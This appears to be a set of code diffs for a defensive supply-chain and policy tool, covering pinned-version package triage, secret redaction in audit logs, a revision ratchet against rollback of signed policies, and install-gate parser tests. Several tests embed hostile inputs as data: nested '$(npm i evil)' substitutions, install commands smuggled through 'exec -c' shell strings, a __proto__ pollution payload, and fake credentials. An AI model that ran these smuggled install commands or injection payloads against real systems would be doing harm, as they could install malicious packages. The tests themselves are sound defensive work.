+                f"version spec '{spec}' of '{pkg}' could not be resolved to a published "
+                f"release (yanked/unpublished/unsupported range) -- cannot verify"
+            )
             return
-    elif spec:
-        rep.warn(f"version spec '{spec}' is a range -- triaged latest ({latest}) instead")
 
     files = releases.get(ver) or []
     if any(f.get("yanked") for f in files):

--- a/skills/triage/scripts/triage.py
+++ b/skills/triage/scripts/triage.py
@@ -19,9 +19,21 @@ Design contract (matches kit's watertight gate):
     are surfaced and scored but do not, by themselves, withhold PASS (criticals do).
 
 Exit code is always 0 on a completed evaluation; kit reads the text, not the code.
+
+Scope (what a PASS DOES and does NOT mean):
+  - PASS means the SPECIFIC target — including a pinned version or dist-tag (`name@1.2.3`,
+    `name@next`, `name==1.2.3`) — EXISTS and clears the health checks: not-found, deprecated,
+    or yanked is a CRITICAL; newness / abandonment / single-maintainer / no-license are
+    warnings. A pinned version is triaged directly, so a clean `latest` never vouches for a
+    yanked or malicious pinned version.
+  - PASS is NOT a malware verdict. This gate does no typosquat, install-script, or behavioral
+    analysis. Deep malware detection is GuardDog (opt-in, separate + heavier: `KIT_GUARDDOG=1`
+    or `[scan] guarddog = true`, run via `kit check`). Treat this as an existence + health +
+    version gate, not proof the code is safe to run.
 """
 import json
 import os
+import re
 import sys
 import urllib.error
 import urllib.parse
@@ -113,8 +125,21 @@ class Report:
             print("TRIAGE FAILED")
 
 
+def _split_npm_spec(target):
+    """Split a npm target into (name, version|tag|None). Handles `@scope/name@ver`
+    (the version `@` is the one AFTER the scope slash) and plain `name@ver`."""
+    if target.startswith("@"):
+        slash = target.find("/")
+        at = target.find("@", slash + 1) if slash != -1 else -1
+    else:
+        at = target.find("@")
+    if at > 0:
+        return target[:at], target[at + 1:]
+    return target, None
+
+
 def triage_npm(rep):
-    pkg = rep.target
+    pkg, spec = _split_npm_spec(rep.target)
     url = f"{NPM_REGISTRY}/{urllib.parse.quote(pkg, safe='@/')}"
     try:
         data, _ = _get_json(url)
@@ -128,18 +153,36 @@ def triage_npm(rep):
         rep.critical("could not reach the npm registry (offline?) -- cannot verify")
         return
 
-    latest = (data.get("dist-tags") or {}).get("latest")
+    dist_tags = data.get("dist-tags") or {}
     versions = data.get("versions") or {}
-    meta = versions.get(latest, {}) if latest else {}
     times = data.get("time") or {}
+    latest = dist_tags.get("latest")
 
+    # Resolve WHICH version to inspect for deprecation/existence. A pinned exact version
+    # or dist-tag is checked directly -- a clean `latest` must never vouch for a yanked or
+    # malicious pinned version (`npm i evil@1.2.3`). A range we can't resolve deterministically
+    # (no semver here) falls back to latest with a note.
+    target_ver = latest
+    if spec:
+        if spec in dist_tags:
+            target_ver = dist_tags[spec]
+        elif spec in versions:
+            target_ver = spec
+        elif re.match(r"^[0-9]+\.[0-9]+", spec):
+            rep.critical(f"pinned version '{spec}' of '{pkg}' not found (yanked/unpublished)")
+            return
+        else:
+            rep.warn(f"version spec '{spec}' is a range -- triaged latest ({latest}) instead")
+
+    meta = versions.get(target_ver, {}) if target_ver else {}
     if meta.get("deprecated"):
-        rep.critical(f"latest version {latest} is DEPRECATED: {str(meta.get('deprecated'))[:80]}")
+        rep.critical(f"version {target_ver} is DEPRECATED: {str(meta.get('deprecated'))[:80]}")
     created_days = _days_since(times.get("created"))
     last_days = _days_since(times.get(latest)) if latest else None
     maint = data.get("maintainers") or meta.get("maintainers") or []
 
-    rep.fact(f"latest {latest}, {len(versions)} versions, {len(maint)} maintainer(s)")
+    tag = f" (latest {latest})" if target_ver != latest else ""
+    rep.fact(f"triaged {target_ver}{tag}, {len(versions)} versions, {len(maint)} maintainer(s)")
     if created_days is not None:
         rep.fact(f"first published {created_days} days ago")
         if created_days < NEW_DAYS:
@@ -150,8 +193,18 @@ def triage_npm(rep):
         rep.warn("single maintainer -- bus-factor / takeover risk")
 
 
+def _split_pip_spec(target):
+    """Split a pip requirement into (name, spec|None), dropping any `[extras]`.
+    e.g. `requests[security]==1.2.3` -> ('requests', '==1.2.3'); `Flask>=2` -> ('Flask', '>=2')."""
+    m = re.match(r"^([A-Za-z0-9][\w.-]*)(?:\[[\w,.-]*\])?\s*(.*)$", target)
+    if not m:
+        return target, None
+    spec = m.group(2).strip()
+    return m.group(1), (spec or None)
+
+
 def triage_pip(rep):
-    pkg = rep.target
+    pkg, spec = _split_pip_spec(rep.target)
     url = f"{PYPI_INDEX}/pypi/{urllib.parse.quote(pkg)}/json"
     try:
         data, _ = _get_json(url)
@@ -167,11 +220,26 @@ def triage_pip(rep):
 
     info = data.get("info") or {}
     releases = data.get("releases") or {}
-    ver = info.get("version")
+    latest = info.get("version")
+
+    # An exact `==` pin is checked directly: a clean latest must not vouch for a yanked or
+    # unpublished pinned version. A range (no resolver here) falls back to latest with a note.
+    ver = latest
+    if spec and spec.startswith("=="):
+        pin = spec[2:].strip()
+        if pin in releases:
+            ver = pin
+        else:
+            rep.critical(f"pinned version '{pin}' of '{pkg}' not found (yanked/unpublished)")
+            return
+    elif spec:
+        rep.warn(f"version spec '{spec}' is a range -- triaged latest ({latest}) instead")
+
     files = releases.get(ver) or []
     if any(f.get("yanked") for f in files):
-        rep.critical(f"latest version {ver} is YANKED")
-    rep.fact(f"latest {ver}, {len(releases)} releases, author: {info.get('author') or 'unknown'}")
+        rep.critical(f"version {ver} is YANKED")
+    tag = f" (latest {latest})" if ver != latest else ""
+    rep.fact(f"triaged {ver}{tag}, {len(releases)} releases, author: {info.get('author') or 'unknown'}")
     last_iso = files[0].get("upload_time_iso_8601") if files else None
     last_days = _days_since(last_iso)
     if last_days is not None and last_days > ABANDONED_DAYS:

--- a/src/audit.test.ts
+++ b/src/audit.test.ts
@@ -346,6 +346,61 @@ describe("formatAuditLog", () => {
   });
 });
 
+describe("audit sink — secret redaction (B3)", () => {
+  it("redacts secrets in error + metadata before writing, and the chain still verifies", async () => {
+    const dir = mkdtempSync(join(tmpdir(), "kit-audit-redact-"));
+    try {
+      const ok = await appendAuditEventDirect(
+        {
+          operation: "elevate",
+          environment: "prod",
+          success: false,
+          error: "failed: key sk-abcdefghijklmnopqrstuvwxyz0123456789ABCD rejected",
+          metadata: {
+            detail: "postgres://app:S3cr3tPassw0rd@db/x",
+            nested: {
+              pem: "-----BEGIN RSA PRIVATE KEY-----\\nMIIabc\\n-----END RSA PRIVATE KEY-----",
+            },
+            count: 7,
+          },
+        },
+        { cwd: dir },
+      );
+      assert.equal(ok, true);
+      const raw = readFileSync(join(dir, ".kit-audit.jsonl"), "utf8");
+      // no secret material persisted
+      assert.ok(!raw.includes("sk-abcdefghijklmnop"), "api key must be gone");
+      assert.ok(!raw.includes("S3cr3tPassw0rd"), "db password must be gone");
+      assert.ok(!raw.includes("MIIabc"), "pem body must be gone");
+      // non-secret structure preserved, and the hash chain covers the redacted form
+      assert.ok(raw.includes('"count":7'));
+      assert.equal(verifyAuditChain(raw).ok, true);
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  });
+
+  it("a __proto__ metadata key does not pollute Object.prototype during redaction", async () => {
+    const dir = mkdtempSync(join(tmpdir(), "kit-audit-proto-"));
+    try {
+      await appendAuditEventDirect(
+        {
+          operation: "x",
+          environment: "dev",
+          success: true,
+          metadata: JSON.parse(
+            '{"__proto__":{"polluted":"sk-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}}',
+          ),
+        },
+        { cwd: dir },
+      );
+      assert.equal(({} as Record<string, unknown>).polluted, undefined);
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  });
+});
+
 describe("verifyAuditChain (tamper-evidence)", () => {
   async function writeEvents(dir: string, n: number): Promise<void> {
     for (let i = 0; i < n; i++) {

--- a/src/audit.test.ts
+++ b/src/audit.test.ts
@@ -380,6 +380,26 @@ describe("audit sink — secret redaction (B3)", () => {
     }
   });
 
+  it("redacts secrets in top-level operation/environment too (command lines)", async () => {
+    const dir = mkdtempSync(join(tmpdir(), "kit-audit-openv-"));
+    try {
+      await appendAuditEventDirect(
+        {
+          operation: `run: git push https://ghp_${"a".repeat(36)}@github.com`,
+          environment: "prod",
+          success: true,
+        },
+        { cwd: dir },
+      );
+      const raw = readFileSync(join(dir, ".kit-audit.jsonl"), "utf8");
+      assert.ok(!raw.includes("ghp_a"), "token in operation must be redacted");
+      assert.ok(raw.includes("[REDACTED]"));
+      assert.equal(verifyAuditChain(raw).ok, true);
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  });
+
   it("a __proto__ metadata key does not pollute Object.prototype during redaction", async () => {
     const dir = mkdtempSync(join(tmpdir(), "kit-audit-proto-"));
     try {

--- a/src/audit.ts
+++ b/src/audit.ts
@@ -34,6 +34,11 @@ function redactAuditValue(v: unknown): unknown {
 function redactAuditEvent(event: AuditEvent): AuditEvent {
   return {
     ...event,
+    // operation strings commonly embed a command line, so a token can land there;
+    // environment is redacted too for the same reason. Both are cheap and normal values
+    // ("secrets.generate", "prod") never match a credential pattern → no false redaction.
+    operation: redactSecrets(event.operation),
+    environment: redactSecrets(event.environment),
     error: event.error ? redactSecrets(event.error) : event.error,
     metadata: event.metadata
       ? (redactAuditValue(event.metadata) as Record<string, unknown>)
@@ -481,6 +486,8 @@ export async function logAuditEvent(
       >;
     }
     if (auditEvent.error) auditEvent.error = redactSecrets(auditEvent.error);
+    auditEvent.operation = redactSecrets(auditEvent.operation);
+    auditEvent.environment = redactSecrets(auditEvent.environment);
   }
 
   // Write to local JSONL file (hash-chained for tamper-evidence). The boolean

--- a/src/audit.ts
+++ b/src/audit.ts
@@ -4,6 +4,42 @@ import { createHash } from "node:crypto";
 import type { GovernanceConfig } from "./config.js";
 import { identityId, verifySignature } from "./identity.js";
 import { resolveKeyStore, assertHardwareIdentity, hardwareRequired } from "./keystore/index.js";
+import { redactSecrets } from "./utils/redactSecrets.js";
+
+// Redact secrets from an audit event BEFORE it is hashed and written. The sink previously
+// stored `error` and `metadata` verbatim, so a credential echoed in an error message or
+// carried under a metadata key (detail/value/output/…) landed in `.kit-audit.jsonl` in
+// plaintext — and, with remote audit on, was shipped. Redaction runs over the whole event,
+// so the persisted line AND its chain hash cover the redacted form (chain stays consistent).
+// Uses defineProperty for reassembly so a `__proto__`/`constructor` metadata key can't
+// pollute the prototype during the walk.
+function redactAuditValue(v: unknown): unknown {
+  if (typeof v === "string") return redactSecrets(v);
+  if (Array.isArray(v)) return v.map(redactAuditValue);
+  if (v && typeof v === "object") {
+    const out: Record<string, unknown> = {};
+    for (const [k, val] of Object.entries(v)) {
+      Object.defineProperty(out, k, {
+        value: redactAuditValue(val),
+        enumerable: true,
+        writable: true,
+        configurable: true,
+      });
+    }
+    return out;
+  }
+  return v;
+}
+
+function redactAuditEvent(event: AuditEvent): AuditEvent {
+  return {
+    ...event,
+    error: event.error ? redactSecrets(event.error) : event.error,
+    metadata: event.metadata
+      ? (redactAuditValue(event.metadata) as Record<string, unknown>)
+      : event.metadata,
+  };
+}
 
 // ── Tamper-evident hash chain ───────────────────────────────────────────────
 // Each appended line carries `prev` (the previous line's hash) and `hash`
@@ -262,10 +298,12 @@ export async function appendAuditEventDirect(
   event: Omit<AuditEvent, "timestamp">,
   opts: { cwd?: string; logFile?: string } = {},
 ): Promise<boolean> {
-  const auditEvent: AuditEvent = {
+  // Redact at construction so EVERY sink — chain write, remote push, pending queue —
+  // sees the redacted event, not just the on-disk chain.
+  const auditEvent: AuditEvent = redactAuditEvent({
     timestamp: new Date().toISOString(),
     ...event,
-  };
+  });
   const logFile = opts.logFile ?? ".kit-audit.jsonl";
   const logPath = resolve(opts.cwd ?? process.cwd(), logFile);
   try {
@@ -430,9 +468,19 @@ export async function logAuditEvent(
     ...event,
   };
 
-  // Remove secrets from metadata if include_secrets is false
-  if (!config.audit.include_secrets && auditEvent.metadata) {
-    auditEvent.metadata = sanitizeMetadata(auditEvent.metadata);
+  // When include_secrets is false (the default), strip secrets two ways: by KEY NAME
+  // (sanitizeMetadata drops keys like `password`) AND by VALUE — redact known credential
+  // patterns from the metadata values and the error string, so a secret echoed in an error
+  // message or carried under an innocuous key (detail/value/output) never persists locally
+  // or ships to Remote. include_secrets=true is an explicit opt-in and skips both.
+  if (!config.audit.include_secrets) {
+    if (auditEvent.metadata) {
+      auditEvent.metadata = redactAuditValue(sanitizeMetadata(auditEvent.metadata)) as Record<
+        string,
+        unknown
+      >;
+    }
+    if (auditEvent.error) auditEvent.error = redactSecrets(auditEvent.error);
   }
 
   // Write to local JSONL file (hash-chained for tamper-evidence). The boolean

--- a/src/control-plane/distribute.test.ts
+++ b/src/control-plane/distribute.test.ts
@@ -47,6 +47,26 @@ function signBundle(signerDir: string, revocations?: RevocationRecord[]): Policy
   }
 }
 
+/** Build an org-signed bundle for arbitrary policy TOML (used for the revision ratchet). */
+function signBundleToml(signerDir: string, policyToml: string): PolicyBundle {
+  const authorDir = mkdtempSync(join(tmpdir(), "kit-cp-author-"));
+  try {
+    writeFileSync(getPolicyPath(authorDir), policyToml, "utf-8");
+    const doc = loadPolicy(authorDir)!;
+    const { identity } = loadOrCreateIdentity(signerDir);
+    const sig = signWithIdentity(canonicalPolicyBytes(doc), signerDir).toString("base64");
+    const policySig = JSON.stringify({
+      kid: identity.id,
+      sig,
+      ts: "2026-07-04T00:00:00.000Z",
+      fingerprint: policyFingerprint(doc),
+    });
+    return { policyToml, policySig };
+  } finally {
+    rmSync(authorDir, { recursive: true, force: true });
+  }
+}
+
 describe("control-plane — verifyPolicyBundle (offline, against the org anchor)", () => {
   let signerDir: string;
   let verifierKit: string;
@@ -189,6 +209,57 @@ describe("control-plane — applyPolicyBundle (write-after-verify, fail-closed)"
     assert.equal(again.applied, true);
     assert.equal(again.revocationsAdded, 0);
     assert.equal(loadRevocations(mergeDir).length, 1);
+  });
+
+  it("enforces the monotonic revision ratchet (rejects a signed rollback)", () => {
+    const rroot = mkdtempSync(join(tmpdir(), "kit-cp2-rev-"));
+    const rmerge = mkdtempSync(join(tmpdir(), "kit-cp2-revm-"));
+    try {
+      addPolicySigner(rroot, loadOrCreateIdentity(signerDir).identity.publicKey);
+      // apply revision 5
+      assert.equal(
+        applyPolicyBundle(signBundleToml(signerDir, "version = 1\nrevision = 5\n"), rroot, {
+          identityDir: rmerge,
+        }).applied,
+        true,
+      );
+      // a validly-signed OLDER revision (3) is refused — the replay/rollback attack
+      const rollback = applyPolicyBundle(
+        signBundleToml(signerDir, "version = 1\nrevision = 3\n"),
+        rroot,
+        {
+          identityDir: rmerge,
+        },
+      );
+      assert.equal(rollback.applied, false);
+      assert.match(rollback.reason ?? "", /rollback/);
+      assert.match(loadPolicy(rroot)!.revision + "", /5/); // on-disk policy unchanged
+      // a validly-signed bundle with NO revision is also refused once a revision is set
+      assert.equal(
+        applyPolicyBundle(signBundleToml(signerDir, "version = 1\n"), rroot, {
+          identityDir: rmerge,
+        }).applied,
+        false,
+      );
+      // a strictly-greater revision (6) advances
+      assert.equal(
+        applyPolicyBundle(signBundleToml(signerDir, "version = 1\nrevision = 6\n"), rroot, {
+          identityDir: rmerge,
+        }).applied,
+        true,
+      );
+      assert.equal(loadPolicy(rroot)!.revision, 6);
+      // idempotent re-apply of the SAME (revision 6) bundle is allowed
+      assert.equal(
+        applyPolicyBundle(signBundleToml(signerDir, "version = 1\nrevision = 6\n"), rroot, {
+          identityDir: rmerge,
+        }).applied,
+        true,
+      );
+    } finally {
+      rmSync(rroot, { recursive: true, force: true });
+      rmSync(rmerge, { recursive: true, force: true });
+    }
   });
 
   it("refuses to apply an unverifiable bundle and leaves root untouched", () => {

--- a/src/control-plane/distribute.test.ts
+++ b/src/control-plane/distribute.test.ts
@@ -262,6 +262,29 @@ describe("control-plane — applyPolicyBundle (write-after-verify, fail-closed)"
     }
   });
 
+  it("an unsigned planted high revision does not freeze legitimate updates", () => {
+    const rroot = mkdtempSync(join(tmpdir(), "kit-cp2-f2-"));
+    const rmerge = mkdtempSync(join(tmpdir(), "kit-cp2-f2m-"));
+    try {
+      addPolicySigner(rroot, loadOrCreateIdentity(signerDir).identity.publicKey);
+      applyPolicyBundle(signBundleToml(signerDir, "version = 1\nrevision = 5\n"), rroot, {
+        identityDir: rmerge,
+      });
+      // attacker with local write plants an UNSIGNED high revision (sig still matches rev 5)
+      writeFileSync(getPolicyPath(rroot), "version = 1\nrevision = 999999\n", "utf-8");
+      // the on-disk policy no longer verifies → its revision is NOT a trusted floor → a
+      // legitimate org-signed rev 6 still applies (no fail-closed DoS on updates)
+      const r = applyPolicyBundle(signBundleToml(signerDir, "version = 1\nrevision = 6\n"), rroot, {
+        identityDir: rmerge,
+      });
+      assert.equal(r.applied, true, r.reason);
+      assert.equal(loadPolicy(rroot)!.revision, 6);
+    } finally {
+      rmSync(rroot, { recursive: true, force: true });
+      rmSync(rmerge, { recursive: true, force: true });
+    }
+  });
+
   it("refuses to apply an unverifiable bundle and leaves root untouched", () => {
     const cleanRoot = mkdtempSync(join(tmpdir(), "kit-cp2-clean-"));
     try {

--- a/src/control-plane/distribute.ts
+++ b/src/control-plane/distribute.ts
@@ -33,6 +33,9 @@ import {
   verifyPolicy,
   getPolicyPath,
   getPolicySigPath,
+  loadPolicy,
+  parsePolicyToml,
+  policyFingerprint,
   type PolicyVerifyResult,
 } from "./../policy-doc.js";
 import { getSignersPath, policySignersMap } from "./../policy-trust.js";
@@ -52,6 +55,10 @@ export interface PolicyBundle {
   /** Signed revocation records to propagate (each verified before merge). */
   revocations?: RevocationRecord[];
 }
+
+/** Upper bound on a remotely-fetched bundle. Real bundles are a few KB; this caps a hostile
+ *  endpoint's response without touching the local-file (air-gap) path. */
+const MAX_BUNDLE_BYTES = 5 * 1024 * 1024;
 
 /** Type guard: a parsed value is a well-formed PolicyBundle. Fail-closed. */
 export function isPolicyBundle(v: unknown): v is PolicyBundle {
@@ -208,6 +215,30 @@ export function applyPolicyBundle(
   const verdict = verifyPolicyBundle(bundle, root);
   if (!verdict.ok) return { applied: false, revocationsAdded: 0, reason: verdict.reason };
 
+  // Monotonic-revision ratchet: reject a validly-signed bundle that would ROLL BACK the
+  // applied policy. The org signs each `revision`; an attacker on the untrusted transport
+  // can only REPLAY a genuinely-signed older bundle — which carries an older (or absent)
+  // revision. Once the current policy declares a revision, an incoming bundle must declare a
+  // strictly-greater one (equal is allowed only for the byte-identical policy — an idempotent
+  // re-sync). A fleet that never sets `revision` keeps today's behavior (no enforcement).
+  const current = loadPolicy(root);
+  if (current?.revision !== undefined) {
+    const incoming = parsePolicyToml(bundle.policyToml);
+    const incomingRev = incoming?.revision;
+    const rollback =
+      incomingRev === undefined ||
+      incomingRev < current.revision ||
+      (incomingRev === current.revision &&
+        verdict.policy.fingerprint !== policyFingerprint(current));
+    if (rollback) {
+      return {
+        applied: false,
+        revocationsAdded: 0,
+        reason: `policy revision ${incomingRev ?? "(absent)"} does not advance the applied revision ${current.revision} — refusing rollback`,
+      };
+    }
+  }
+
   writeFileSync(getPolicyPath(root), bundle.policyToml, "utf-8");
   writeFileSync(getPolicySigPath(root), bundle.policySig, "utf-8");
   const revocationsAdded = appendRevocations(verdict.verifiedRevocations, opts.identityDir);
@@ -231,9 +262,21 @@ export async function fetchPolicyBundle(
   let raw: string;
   if (/^https?:\/\//.test(source)) {
     const doFetch = opts.fetchImpl ?? fetch;
-    const res = await doFetch(source, { headers: { Accept: "application/json" } });
+    // Bounded fetch: a 15s timeout so a hung/slow endpoint can't stall indefinitely, and a
+    // size cap so a hostile endpoint can't stream an unbounded body. A real bundle is a few KB.
+    const res = await doFetch(source, {
+      headers: { Accept: "application/json" },
+      signal: AbortSignal.timeout(15_000),
+    });
     if (!res.ok) throw new Error(`policy bundle fetch failed: HTTP ${res.status}`);
+    const declared = Number(res.headers?.get?.("content-length"));
+    if (Number.isFinite(declared) && declared > MAX_BUNDLE_BYTES) {
+      throw new Error(`policy bundle too large: ${declared} bytes (max ${MAX_BUNDLE_BYTES})`);
+    }
     raw = await res.text();
+    if (raw.length > MAX_BUNDLE_BYTES) {
+      throw new Error(`policy bundle too large: ${raw.length} bytes (max ${MAX_BUNDLE_BYTES})`);
+    }
   } else {
     const path = source.startsWith("file:") ? new URL(source).pathname : source;
     raw = readFileSync(path, "utf-8");

--- a/src/control-plane/distribute.ts
+++ b/src/control-plane/distribute.ts
@@ -216,25 +216,34 @@ export function applyPolicyBundle(
   if (!verdict.ok) return { applied: false, revocationsAdded: 0, reason: verdict.reason };
 
   // Monotonic-revision ratchet: reject a validly-signed bundle that would ROLL BACK the
-  // applied policy. The org signs each `revision`; an attacker on the untrusted transport
-  // can only REPLAY a genuinely-signed older bundle — which carries an older (or absent)
-  // revision. Once the current policy declares a revision, an incoming bundle must declare a
-  // strictly-greater one (equal is allowed only for the byte-identical policy — an idempotent
-  // re-sync). A fleet that never sets `revision` keeps today's behavior (no enforcement).
+  // applied policy. The org signs each `revision` (it's in the canonical signed bytes, so it
+  // can't be forged over the transport); an attacker who REPLAYS a genuinely-signed older
+  // bundle carries an older (or absent) revision. Once the applied policy declares a revision,
+  // an incoming bundle must declare a strictly-greater one (equal only for the byte-identical
+  // policy — idempotent re-sync). A fleet that never sets `revision` keeps today's behavior.
+  //
+  // The floor is trusted ONLY if the on-disk policy itself VERIFIES against the org anchor —
+  // an unsigned/tampered local file must not set the floor, else a planted high `revision`
+  // would freeze all legit updates (fail-closed DoS). (A local attacker who DELETES the policy
+  // can still reset the floor; fully closing that needs a persistent tamper-evident high-water
+  // mark — tracked separately. Enforcement fails closed on any policy they can't org-sign.)
   const current = loadPolicy(root);
-  if (current?.revision !== undefined) {
+  const floor =
+    current?.revision !== undefined && verifyPolicy(root).status === "valid"
+      ? current.revision
+      : undefined;
+  if (floor !== undefined) {
     const incoming = parsePolicyToml(bundle.policyToml);
     const incomingRev = incoming?.revision;
     const rollback =
       incomingRev === undefined ||
-      incomingRev < current.revision ||
-      (incomingRev === current.revision &&
-        verdict.policy.fingerprint !== policyFingerprint(current));
+      incomingRev < floor ||
+      (incomingRev === floor && verdict.policy.fingerprint !== policyFingerprint(current));
     if (rollback) {
       return {
         applied: false,
         revocationsAdded: 0,
-        reason: `policy revision ${incomingRev ?? "(absent)"} does not advance the applied revision ${current.revision} — refusing rollback`,
+        reason: `policy revision ${incomingRev ?? "(absent)"} does not advance the applied revision ${floor} — refusing rollback`,
       };
     }
   }

--- a/src/env-inspect.test.ts
+++ b/src/env-inspect.test.ts
@@ -35,13 +35,18 @@ describe("parseEnvFile", () => {
 });
 
 describe("redactValue", () => {
-  it("shows first 4 chars + **** for longer values", () => {
-    assert.equal(redactValue("sk-or-v1-abc123"), "sk-o****");
+  it("reveals at most 4 chars and at most ~1/6 of the value", () => {
+    assert.equal(redactValue("sk-or-v1-abc123"), "sk****"); // len 15 → reveal 2
+    assert.equal(redactValue("a".repeat(24)), "aaaa****"); // long → cap at 4
+    assert.equal(redactValue("a".repeat(60)), "aaaa****"); // still capped at 4
   });
 
-  it("returns **** for values of 4 chars or less", () => {
+  it("fully masks short values (no fixed-prefix leak)", () => {
+    // The old fixed 4-char prefix exposed most of a short secret; short values now mask fully.
     assert.equal(redactValue("abc"), "****");
     assert.equal(redactValue("abcd"), "****");
+    assert.equal(redactValue("abcde"), "****"); // len 5 → reveal 0
+    assert.equal(redactValue("secret"), "s****"); // len 6 → reveal 1
   });
 
   it("works for empty string", () => {

--- a/src/env-inspect.ts
+++ b/src/env-inspect.ts
@@ -53,11 +53,14 @@ export function parseEnvFile(content: string): Record<string, string> {
 }
 
 /**
- * Redact a secret value: show first 4 chars + ****
+ * Redact a secret value for display: reveal a short leading fragment for recognizability,
+ * but only a fraction that stays negligible. The old fixed 4-char prefix exposed 50–80% of
+ * a short secret (a 5–8 char token was mostly readable); reveal at most 4 chars AND at most
+ * ~1/6 of the value, fully masking anything too short.
  */
 export function redactValue(value: string): string {
-  if (value.length <= 4) return "****";
-  return value.slice(0, 4) + "****";
+  const reveal = Math.min(4, Math.floor(value.length / 6));
+  return reveal > 0 ? value.slice(0, reveal) + "****" : "****";
 }
 
 export async function inspectEnv(

--- a/src/id-generator.test.ts
+++ b/src/id-generator.test.ts
@@ -1,0 +1,28 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { generateId, IdGenerators } from "./id-generator.js";
+
+describe("generateId", () => {
+  it("is unique, prefixed, and capped at 255 chars", () => {
+    const a = generateId("approval-");
+    const b = generateId("approval-");
+    assert.notEqual(a, b);
+    assert.ok(a.startsWith("approval-"));
+    assert.ok(a.length <= 255);
+  });
+
+  it("uses a cryptographically-strong (UUID) random component, not Math.random", () => {
+    // A v4 UUID tail proves the strong-random source; `Math.random().toString(36)` never has
+    // the 8-4-4-4-12 hyphen shape.
+    const id = generateId("x");
+    assert.match(id, /-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/);
+    // no collisions across a batch
+    const seen = new Set(Array.from({ length: 1000 }, () => generateId("k-")));
+    assert.equal(seen.size, 1000);
+  });
+
+  it("IdGenerators apply their domain prefix", () => {
+    assert.ok(IdGenerators.approval().startsWith("approval-"));
+    assert.ok(IdGenerators.trace("z").startsWith("trace-z"));
+  });
+});

--- a/src/id-generator.ts
+++ b/src/id-generator.ts
@@ -1,14 +1,18 @@
 /**
  * Centralized ID generation utility
- * Consolidates Date.now() + random pattern used across services
+ * Consolidates the timestamp + random pattern used across services
  */
+import { randomUUID } from "node:crypto";
 
 /**
- * Generate unique ID with optional prefix
- * Pattern: prefix + timestamp-randomString (max 255 chars)
+ * Generate a unique ID with an optional prefix.
+ * Pattern: prefix + timestamp-uuid (max 255 chars). The random component is a
+ * cryptographically-strong UUID (was `Math.random()`, ~11 chars of predictable
+ * entropy) so IDs are unguessable even where one is used as an approval/reference
+ * handle, not just a correlation id. The leading timestamp keeps rough sortability.
  */
 export function generateId(prefix: string = ""): string {
-  const id = `${prefix}${Date.now()}-${Math.random().toString(36).slice(2)}`;
+  const id = `${prefix}${Date.now()}-${randomUUID()}`;
   return id.slice(0, 255);
 }
 

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -647,6 +647,17 @@ describe("parseInstallCommand — round-5 bypass closes", () => {
     assert.deepEqual(p.refs, ["npm:evil"]);
   });
 
+  it("nested-command queue is linear on many duplicate nested items (no O(N^2) shift)", () => {
+    // `queue.shift()` on a large array was O(N); N identical `$(…)` items → O(N^2) (~4.5s at
+    // 80k). A head cursor + push-dedup makes it linear.
+    const cmd = "$(npm i evil) ".repeat(80000);
+    const start = process.hrtime.bigint();
+    const p = parseInstallCommand(cmd);
+    const ms = Number(process.hrtime.bigint() - start) / 1e6;
+    assert.ok(ms < 1500, `parse took ${ms}ms — possible O(N^2) regression`);
+    assert.equal(p.isInstall, true); // fail-closed: unresolvable indirection
+  });
+
   it("exec -c/--call shell string is recursed, not mis-gated as a package", () => {
     for (const cmd of [
       'npm exec -c "npm i evil"',

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -636,6 +636,17 @@ describe("parseInstallCommand — round-5 bypass closes", () => {
     assert.deepEqual(p.refs, ["npm:sometool"]);
   });
 
+  it("segment splitting is linear on whitespace-padded input (no O(N^2) blowup)", () => {
+    // A long leading whitespace run made SEGMENT_SPLIT's `\s*` padding quadratic (~30s at
+    // 200k). Detection stays correct; this guards the timing.
+    const cmd = " ".repeat(200000) + "npm i evil";
+    const start = process.hrtime.bigint();
+    const p = parseInstallCommand(cmd);
+    const ms = Number(process.hrtime.bigint() - start) / 1e6;
+    assert.ok(ms < 500, `parse took ${ms}ms — possible O(N^2) regression`);
+    assert.deepEqual(p.refs, ["npm:evil"]);
+  });
+
   it("exec -c/--call shell string is recursed, not mis-gated as a package", () => {
     for (const cmd of [
       'npm exec -c "npm i evil"',

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -559,6 +559,14 @@ describe("parseInstallCommand — round-5 bypass closes", () => {
     // --package alongside -c: the package is still gated, the call string recursed
     assert.deepEqual(parseInstallCommand('npm exec --package=evil -c "cmd"').refs, ["npm:evil"]);
   });
+
+  it("a -c AFTER the exec command is the TOOL's flag — the package is still gated", () => {
+    // `npm exec jest -c jest.config.js`: -c belongs to jest; jest is a fetched package that
+    // must NOT be suppressed. Only a -c/--call BEFORE the command is npm's shell-call flag.
+    assert.deepEqual(parseInstallCommand("npm exec jest -c jest.config.js").refs, ["npm:jest"]);
+    assert.deepEqual(parseInstallCommand("npm exec eslint . -c .eslintrc").refs, ["npm:eslint"]);
+    assert.deepEqual(parseInstallCommand("npm exec --package foo -c bar").refs, ["npm:foo"]);
+  });
 });
 
 // Fake triage: pass everything except names in `blocklist`.

--- a/src/install-gate.test.ts
+++ b/src/install-gate.test.ts
@@ -578,6 +578,48 @@ describe("parseInstallCommand — round-5 bypass closes", () => {
     assert.deepEqual(parseInstallCommand("npm i @scope/pkg@1").refs, ["npm:@scope/pkg"]);
   });
 
+  it("version-pinned exec -c recurses the shell string (corepack pnpm@9 exec -c)", () => {
+    // regression: the @version strip made the segment matcher suppress the positional, so the
+    // nestedCommands exec-call recursion must also allow @version or the string is never seen.
+    for (const cmd of [
+      'corepack pnpm@9 exec -c "npm i evil"',
+      'corepack pnpm@9.1.0 exec -c "npm i evil"',
+      'corepack yarn@1 exec -c "npm i evil"',
+      'pnpm@9 exec -c "npm i evil"',
+      'bun@1 x -c "npm i evil"',
+    ]) {
+      assert.ok(parseInstallCommand(cmd).refs.includes("npm:evil"), cmd);
+    }
+    assert.ok(
+      parseInstallCommand('corepack pnpm@9 exec --call "pip install evil"').refs.includes(
+        "pip:evil",
+      ),
+    );
+  });
+
+  it("a runner whose first positional is a package manager recurses the inner install", () => {
